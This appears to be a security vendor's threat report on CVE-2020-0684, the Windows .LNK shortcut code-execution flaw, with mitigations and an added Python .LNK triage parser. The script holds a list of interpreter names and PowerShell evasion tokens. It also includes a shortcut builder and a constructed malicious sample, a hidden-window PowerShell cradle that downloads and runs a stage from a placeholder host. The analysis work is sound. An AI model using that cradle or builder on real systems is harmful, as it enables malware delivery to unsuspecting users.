This report covers CVE-2020-0684, a remote code execution vulnerability in the way Microsoft Windows processes .LNK (shortcut) files. It affects multiple supported versions of Windows, successful exploitation depends on social engineering, and Microsoft has released a patch for each affected operating system.
Tactics, Techniques, and Procedures
The flaw lies in how Windows handles a specially crafted .LNK file: when the shortcut is processed, for example when Windows Explorer displays a folder, removable drive, or share that contains it, the attacker's code runs with the privileges of the logged-on user. Because the code runs as that user, the impact scales with the account's permissions; where the user is a local administrator, the attacker effectively owns the host.
Attackers commonly deliver the malicious shortcut in one of three ways:
- The simplest route is a phishing email built around urgency or scare tactics. The email carries a .LNK file as an attachment, and the shortcut either contains the malicious payload itself or points back to malware hosted elsewhere.
- The shortcut can point to a website hosting malware, such as a landing page that serves the next stage.
- The shortcut can point to a malicious binary, for example one delivered alongside it, which gives the attacker free rein over what executes on the host.
Every one of these paths relies on social engineering. Two further delivery methods, both requiring more effort from the attacker, are planting the file on a removable drive (for example a USB stick handed or mailed to the target) and staging it on a remote network share that the user is lured into browsing.
- Successful exploitation opens a wide range of follow-on options for the attacker, including propagating malware across the network
- Lateral movement is likely, depending on the privileges of the logged-on user on the affected host; given enough time an attacker can entrench themselves in the environment
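As an added example (not part of the Avertium report, and not Avertium tooling), the following Python script shows how an analyst can triage a suspect .LNK attachment offline before a user ever opens it. It parses the ShellLinkHeader, the LinkInfo target path and the command-line arguments according to the MS-SHLLINK layout, then applies a handful of heuristics matching the behaviours described above: a shortcut that launches an interpreter, hides its window, or fetches a stage from a URL. The suspect-target list, the evasion tokens, the thresholds, and the two sample shortcuts produced by `build_lnk` are all assumptions constructed here for illustration, not real-world artefacts.

```python
"""Triage parser for Windows Shell Link (.LNK, MS-SHLLINK) files.

Added example: reads the ShellLinkHeader, LinkInfo and StringData sections and
flags shortcuts that launch script interpreters or fetch a payload from a URL.
Deliberately minimal (no IDList decoding, no ExtraData): a triage aid, not a
full forensic parser.
"""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand: start the target minimised, without focus

# Assumed list of targets an e-mailed desktop shortcut has little reason to launch.
SUSPECT_TARGETS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                   "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Assumed argument fragments typical of hidden-window download cradles.
EVASION_TOKENS = ("-enc", "-w hidden", "-windowstyle hidden", "bypass", "iex", "downloadstring")


def _cstr(buf: bytes, off: int) -> str:
    """NUL-terminated ANSI string starting at buf[off]."""
    return buf[off:buf.index(b"\x00", off)].decode("latin-1")


def parse_lnk(data: bytes) -> dict:
    """Return target path, ShowCommand and the StringData fields of a .LNK."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show_cmd = struct.unpack_from("<I", data, 0x3C)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:                      # IDListSize (2 bytes), then the IDList itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    target = ""
    if flags & HAS_LINK_INFO:
        li = pos                                 # LinkInfo offsets are relative to its start
        size, _hdr_size, li_flags = struct.unpack_from("<III", data, li)
        if li_flags & 0x1:                       # VolumeIDAndLocalBasePath
            target = _cstr(data, li + struct.unpack_from("<I", data, li + 0x10)[0])
        target += _cstr(data, li + struct.unpack_from("<I", data, li + 0x18)[0])  # CommonPathSuffix
        pos += size
    strings = {}
    for key, bit in (("name", HAS_NAME), ("relative_path", HAS_REL_PATH), ("working_dir", HAS_WORK_DIR),
                     ("arguments", HAS_ARGS), ("icon_location", HAS_ICON)):
        if flags & bit:                          # CountCharacters, then the string, no terminator
            n = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            strings[key] = data[pos:pos + width * n].decode("utf-16-le" if width == 2 else "latin-1")
            pos += width * n
    return {"flags": flags, "show_command": show_cmd, "target": target, **strings}


def triage(info: dict) -> list:
    """Heuristic findings for one parsed shortcut; an empty list means nothing stood out."""
    findings = []
    exe = info["target"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = info.get("arguments", "")
    lowered = args.lower()
    if exe in SUSPECT_TARGETS:
        findings.append(f"target is a script interpreter or LOLBin: {exe}")
    if "http://" in lowered or "https://" in lowered:
        findings.append("arguments contain a URL (likely a download cradle)")
    if any(tok in lowered for tok in EVASION_TOKENS):
        findings.append("arguments use PowerShell hiding/download switches")
    if len(args) > 200:
        findings.append(f"unusually long arguments ({len(args)} chars)")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimised (SW_SHOWMINNOACTIVE)")
    return findings


def build_lnk(target: str, arguments: str, show_command: int = 1) -> bytes:
    """Write a minimal but well-formed .LNK (LinkInfo + COMMAND_LINE_ARGUMENTS).
    Used only to construct the samples below; not a general shortcut writer."""
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"        # DRIVE_FIXED, empty label
    base = target.encode("latin-1") + b"\x00"
    vol_off, hdr_size = 0x1C, 0x1C
    base_off = vol_off + len(volume_id)
    suffix_off = base_off + len(base)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, hdr_size, 0x1, vol_off, base_off, 0, suffix_off)
    link_info += volume_id + base + b"\x00"                               # empty CommonPathSuffix
    flags = HAS_LINK_INFO | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<II", flags, 0x20) + b"\x00" * 24
    header += struct.pack("<IIIHHII", 0, 0, show_command, 0, 0, 0, 0)    # FileSize .. Reserved3
    return header + link_info + struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")


# Constructed samples (not real-world artefacts); the URL is a placeholder.
SAMPLE_MALICIOUS = build_lnk(
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -nop -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')\"",
    show_command=SW_SHOWMINNOACTIVE)
SAMPLE_BENIGN = build_lnk(r"C:\Program Files\Notepad++\notepad++.exe", "")

if __name__ == "__main__":
    for label, blob in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        info = parse_lnk(blob)
        print(label, info["target"], triage(info))
```

To run it against a real attachment, call `triage(parse_lnk(open(path, "rb").read()))` on an analysis box, never by double-clicking the file. Two caveats: the parser skips the IDList, so a shortcut whose target is encoded only there (no LinkInfo) returns an empty target, and targets on network shares (CommonNetworkRelativeLink) are not resolved; treat either case as a reason to look closer rather than as a clean result.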
We strongly encourage applying the vendor patch Microsoft has released for each affected version of Windows.
- Design the environment around the principle of least privilege, with particular attention to end-user workstations: if the user who opens the shortcut is not a local administrator, the attacker's code is not either
- Block USB mass-storage devices by default; several endpoint suites can whitelist approved devices by hardware identifier (vendor/product ID or serial number)
- Pair spam and phishing filtering with phishing awareness training to reduce the likelihood that users open the attachment in the first place
IBM X-Force Exchange:
Belkasoft’s Forensic Analysis of LNK Files
Note: The Avertium Threat Report analyzes one current threat that has been shared by threat intelligence networks across the globe. Used internally by the Avertium CyberOps Team, this report will outline a “top-of-mind” threat and how it ought to be addressed accordingly.
This informed analysis is based on the latest data available.